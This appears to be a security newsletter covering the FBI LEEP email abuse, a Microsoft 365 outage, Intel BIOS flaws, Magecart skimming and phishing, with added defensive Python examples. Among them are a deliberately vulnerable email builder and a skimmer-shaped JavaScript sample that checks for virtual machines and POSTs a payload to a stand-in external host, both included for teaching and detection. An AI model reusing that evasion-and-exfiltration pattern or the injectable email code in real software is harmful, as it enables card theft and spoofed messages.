FBI Email System Hacked

Summary: On the evening of November 12, phony emails were sent out to tens of thousands of addresses from the FBI’s Law Enforcement Enterprise Portal. Per the website, “the Law Enforcement Enterprise Portal (LEEP) is a secure platform for law enforcement agencies, intelligence groups, and criminal justice entities.” Although the recipients of the emails were not specified, it is likely they fall under those categories.

The threat actor was identified as pompompurin via an email exchange they had with security researcher Krebs on Security. Insecure code on the website allowed the hacker to exploit a flaw in the LEEP registration process involving a one-time code sent via email. By altering the script, they were able to replace the email contents with their own material. The purpose of the attack is two-fold: to discredit white hat hacker and security researcher Vinny Troia, who was named in the email, and to shed light on the FBI’s lack of web security. The FBI released an official statement on the 14th confirming the incident and resolution.

Why it matters: Security needs to be emphasized at every layer in an organization, from employees to infrastructure. Oftentimes, websites are not built with security in mind, but including secure coding at every step of the software development lifecycle is crucial.

The Open Web Application Security Project’s Top Ten Application Security Risks provides a framework for developing secure code that minimizes the risk of exploitation. In this example, the script input was not sanitized properly, allowing pompompurin to insert their own text. Lack of input validation can lead to other injection attacks that may grant access to sensitive information. Additionally, despite LEEP’s purpose as a resource for government agencies, no restrictions were in place to prevent unauthorized persons from registering for an account. Proper access control is crucial when dealing with data.
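As an added illustration (not the LEEP code, which is not public), the two builders below contrast the flaw described above with its fix: the vulnerable version lets the request supply the message text, the hardened version accepts only a validated recipient and fixes everything else server-side. The parameter names, subject line and sample request are assumptions.

```python
import re
from dataclasses import dataclass

# Recipient address: a simple shape check; the character classes also exclude CR/LF,
# which blocks mail-header injection through the address field
ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

@dataclass
class Email:
    to: str
    subject: str
    body: str

def build_email_vulnerable(params: dict) -> Email:
    """The pattern described above: the text of the one-time-code message is
    taken from the client's request, so whoever edits the request controls
    what the server sends out under its own name."""
    return Email(to=params["email"], subject=params["subject"], body=params["body"])

def build_email_hardened(params: dict, code: str) -> Email:
    """Only the recipient address comes from the client, and it is validated;
    subject and body are fixed templates, and the one-time code is generated
    server-side (passed in by the caller) rather than read from the request."""
    to = str(params.get("email", "")).strip()
    if not ADDRESS.fullmatch(to):
        raise ValueError("invalid recipient address")
    if not re.fullmatch(r"[0-9]{6}", code):
        raise ValueError("one-time code must be six digits")
    return Email(
        to=to,
        subject="LEEP registration: your one-time code",
        body=f"Your one-time code is {code}.",
    )

def is_accepted(params: dict, code: str) -> bool:
    """True if the hardened builder accepts the request, False if it rejects it."""
    try:
        build_email_hardened(params, code)
        return True
    except ValueError:
        return False

# constructed tampered request: attacker-chosen subject, body and code
TAMPERED = {"email": "recipient@example.invalid", "subject": "Urgent notice",
            "body": "attacker-controlled text", "code": "000000"}
```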

Microsoft 365 Outage

Summary: On November 2nd, users were reporting they no longer had access to Excel files stored on Microsoft OneDrive and SharePoint. Microsoft then issued an Office 365 service alert stating that the “impacted services may include, but aren’t limited to, SharePoint Online, OneDrive for Business, Microsoft Teams, and Microsoft 365 apps.”

After an investigation took place, Microsoft concluded the root cause was a patch for an unrelated fix implemented earlier that day. This resulted in the issues many users were bringing up on social media. At approximately 1 PM Eastern Time, Microsoft announced, “We identified that a recently deployed code change that was intended to address a separate issue resulted in impact” … “We reverted the offending change and monitored the service to confirm that this has resolved the problem. Users may need to refresh their web browser or restart their app to see resolution.”

Why it matters: Thankfully, this issue was resolved the day it appeared. However, it highlights one core tenet of the cyber security Confidentiality, Integrity, and Availability (CIA) triad, as well as the 3-2-1 backup practice. The Availability tenet ensures that data and systems are up, operational, and can be accessed by users when needed. The 3-2-1 backup practice maintains that 3 copies of your data should exist:

  • 1 is in production and used every day
  • 2 are copies in differing locations
    • 1 cold backup on physical storage in an offsite location
    • 1 in the cloud or a Network Accessible Storage device

As many companies employ the use of Windows machines with Microsoft Office, the simplest way to implement cloud storage is via OneDrive and SharePoint. They natively support all the Office applications and seamlessly integrate into the environment. This is where the issue lies: all these applications and the cloud service are offered by Microsoft. This dependence on all Microsoft services results in a single point of failure.

When it comes to ensuring backups exist, it is important to maintain off-site cold storage. While slow, resource intensive, and sometimes costly, it is critical to keep this option open in the event of a critical loss of data or an event resulting in extended inaccessibility.
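As an added example (not from the newsletter), the checker below evaluates a backup inventory against the 3-2-1 layout listed above and also flags the single-provider dependency this section warns about. The record fields and both sample inventories are constructed assumptions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Copy:
    name: str
    kind: str       # "production", "cold", "cloud" or "nas"
    location: str   # site or region where the copy lives
    provider: str   # who operates the storage
    online: bool    # reachable over the network (False for cold storage)

def check_321(copies: list[Copy]) -> list[str]:
    """Return the requirements the inventory fails; an empty list means compliant."""
    problems = []
    if len(copies) < 3:
        problems.append("fewer than 3 copies")
    if not any(c.kind == "production" for c in copies):
        problems.append("no production copy")
    if not any(c.kind == "cold" and not c.online for c in copies):
        problems.append("no offline cold backup")
    cold_sites = {c.location for c in copies if c.kind == "cold"}
    prod_sites = {c.location for c in copies if c.kind == "production"}
    if cold_sites and cold_sites <= prod_sites:
        problems.append("cold backup is not offsite")
    if not any(c.kind in ("cloud", "nas") for c in copies):
        problems.append("no cloud or NAS copy")
    if len({c.location for c in copies}) < 2:
        problems.append("all copies share one location")
    # the single point of failure from the outage: every copy depends on one provider
    if len({c.provider for c in copies}) == 1:
        problems.append("all copies depend on a single provider")
    return problems

# constructed inventories: everything inside one vendor's cloud, and a corrected layout
ALL_ONE_PROVIDER = [
    Copy("excel-on-onedrive", "production", "ms-region-a", "Microsoft", True),
    Copy("sharepoint-library", "cloud", "ms-region-a", "Microsoft", True),
    Copy("teams-files", "cloud", "ms-region-a", "Microsoft", True),
]
CORRECTED = [
    Copy("excel-on-onedrive", "production", "ms-region-a", "Microsoft", True),
    Copy("office-nas", "nas", "head-office", "self", True),
    Copy("tape-set", "cold", "vault-b", "ExampleVault", False),
]
```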

High Severity BIOS Flaws Affect Numerous Intel Processors

Summary: On November 9th, Intel released a BIOS Reference Code Advisory for two vulnerabilities “discovered by SentinelOne and are tracked as CVE-2021-0157 and CVE-2021-0158, and both have a CVSS v3 score of 8.2 (high)”. The two concerns emanate from insufficient control management and input validation, respectively. An attacker could use these to escalate privileges to a remarkably high level and establish persistence on a machine.

The processors affected were various Intel Xeon Processors, 11th Generation Intel Core Processors, 10th Generation Intel Core Processors, 7th Generation Intel Core Processors, Intel Core X-series Processors, Intel Celeron Processor N Series, and Intel Pentium Silver Processor Series. One key detail is that in order to take advantage of the flaws discovered, an attacker will require physical access to a machine. This gives users ample time to update BIOS and ensure the systems are not vulnerable. However, the 7th generation Intel processors were released 5 years ago. Most motherboard manufacturers do not support BIOS updates that far into the future for a motherboard. As such, some systems may not receive any BIOS security updates leaving users without a viable fix.

Why it matters: As these concerns require an attacker to have physical access to a system, most users and companies might consider this to be a non-threat. However, this highlights the CIA triad tenet of Accessibility. Not only should data be accessible to users, but who has access is also of vital importance.

Well-defended servers are no match for an attacker who can stroll into a server room and plug into the server physically. Physical security is important when cyber security is discussed. Whether access to sensitive areas is controlled by key, access codes, proximity cards, or biometric scanners, having multiple ways of validating a user’s identity before they even have physical access to a machine is vital.

Additionally, just because someone has permission to access a place with higher clearance does not mean that they are authorized to interact with a machine present. Janitorial, maintenance, HVAC, and other staff might be authorized to enter but not to access a device. A coworker could easily browse the internet using your device, resulting in those actions being attributed to you, regardless of how benign the activity. Actions taken on a machine can be attributed to the device, but not always to the user at the keyboard. Therefore, it is important that all users lock their devices every time they get up and leave their workstation.

Magecart Credit Card Skimmer Evades Researchers to Target Victims

Summary: On November 7, Threatpost reported a sophisticated new threat actor that detects Virtual Machines and other sandbox tools used by researchers to evade discovery and steal credit card information from unsuspecting victims. Magecart is a skimming attack that intercepts the transmission of electronic payment data during online checkout via code injection on vulnerable websites. The script in question performs a browser check to determine whether the host device is a virtual machine by identifying the graphics renderer. If no virtual machine is detected, the skimmer collects the data and sends it to the attacker via a POST request.

Why it matters: Attackers are adapting their techniques to avoid detection by trained professionals. Oftentimes professionals will utilize virtual machines to observe an attacker’s techniques and methodologies; by scanning the system, the attackers are able to more accurately determine if they are being observed. Skimmers such as q-logger use encoding and obscure JavaScript to hide their tracks. Additionally, they have adapted to using numerous domains and content delivery networks to hide their origin. Magecart and other injection attacks typically target systems running out-of-date software or insecure code. Be sure to update your systems and employ defense-in-depth as much as possible. Malwarebytes has compiled a list of indicators of compromise (IOCs) associated with a Magecart attack.
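As an added defender-side example (not from the newsletter or the Malwarebytes IOC list), the triage helper below scores a page’s inline scripts for the two behaviours described above: a WebGL renderer probe used to spot virtual machines, and a POST to a host outside the site’s own domain. The signal patterns and both sample scripts are constructed assumptions meant for triage, not a detection engine.

```python
import re
from urllib.parse import urlparse

# Heuristic signals drawn from the behaviour described in the article
SIGNALS = {
    "renderer_probe": re.compile(r"WEBGL_debug_renderer_info|UNMASKED_RENDERER_WEBGL"),
    "vm_strings": re.compile(r"swiftshader|virtualbox|vmware|llvmpipe", re.I),
    "post_request": re.compile(r"method\s*:\s*['\"]POST['\"]|\.open\(\s*['\"]POST['\"]", re.I),
}

def external_hosts(script: str, site_host: str) -> set[str]:
    """Hosts referenced by absolute URLs in the script, excluding the site's own domain."""
    found = set()
    for url in re.findall(r"https?://[^\s'\"()]+", script):
        host = (urlparse(url).hostname or "").lower()
        if host and host != site_host and not host.endswith("." + site_host):
            found.add(host)
    return found

def score_script(script: str, site_host: str) -> tuple[int, list[str]]:
    """Return (score, triggered signal names) for one inline script."""
    hits = [name for name, rx in SIGNALS.items() if rx.search(script)]
    if "post_request" in hits and external_hosts(script, site_host):
        hits.append("post_to_external_host")   # the exfiltration shape described above
    return len(hits), hits

# constructed samples: a normal first-party cart call and a skimmer-shaped script
BENIGN = "fetch('https://shop.example/api/cart', {method: 'POST', body: JSON.stringify(cart)});"
SUSPECT = """
var dbg = gl.getExtension('WEBGL_debug_renderer_info');
var renderer = gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL);
if (!/swiftshader|virtualbox|vmware/i.test(renderer)) {
  fetch('https://cdn-assets.invalid/collect', {method: 'POST', body: payload});
}
"""
```

A score of 1 on the benign snippet comes from the plain POST signal alone; the renderer probe together with an off-site POST is what separates the suspect script.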

Security Tip of the Month

As we move into December, holiday shopping is well under way and with it comes the need for secure purchasing. Attackers can take advantage of the urgency of shopping for the holidays and send out targeted phishing attempts purporting to be from retailers or shipping companies. These phishing attempts can be delivered via email or, increasingly, through SMS. Krebs on Security wrote a blog post on a FedEx smishing scam that included a link viewable only on mobile devices requesting personal and financial information to “reschedule delivery” of a lost package.

Exercise caution when clicking on links in emails or text messages. When possible, navigate directly to the official website instead. Be wary of shopping on unfamiliar sites and of deals that appear too good to be true. When entering sensitive information like credit card data and addresses, make sure there is a padlock next to the website URL that indicates the connection is secure. Take care when navigating to a website, as threat actors may typosquat and take advantage of mistyped URLs to lead users to a malicious webpage. Review your credit card statements for unknown transactions and report any suspicious activity to your bank.
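As an added example (not from the newsletter), the helper below applies the checks in this tip to a link before it is opened: whether it is HTTPS, whether the host is a known brand domain, whether a brand name is merely tucked inside some other domain, and whether the domain label is a near-miss typo of a brand. The brand allowlist and sample URLs are constructed assumptions, and the domain split is a crude approximation that ignores multi-part public suffixes.

```python
from urllib.parse import urlparse

# Assumed allowlist of exact brand hosts; a real deployment would maintain its own
KNOWN_BRANDS = {"fedex": {"fedex.com"}, "exampleshop": {"exampleshop.invalid"}}

def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def triage_link(url: str) -> list[str]:
    """Return reasons the link deserves caution; an empty list means no flag raised."""
    reasons = []
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if p.scheme != "https":
        reasons.append("not https (no padlock)")
    if not host:
        return reasons + ["no host"]
    labels = host.split(".")
    registered = ".".join(labels[-2:])      # crude: assumes a one-label public suffix
    sld = labels[-2] if len(labels) >= 2 else host
    for brand, hosts in KNOWN_BRANDS.items():
        if host in hosts or any(host.endswith("." + h) for h in hosts):
            return reasons                  # genuine brand domain; nothing more to check
        if brand in labels[:-2] or (brand in sld and sld != brand):
            reasons.append(f"'{brand}' used inside another domain ({registered})")
        elif 0 < levenshtein(sld, brand) <= 2:
            reasons.append(f"'{sld}' is a near-miss of '{brand}' (possible typosquat)")
    return reasons
```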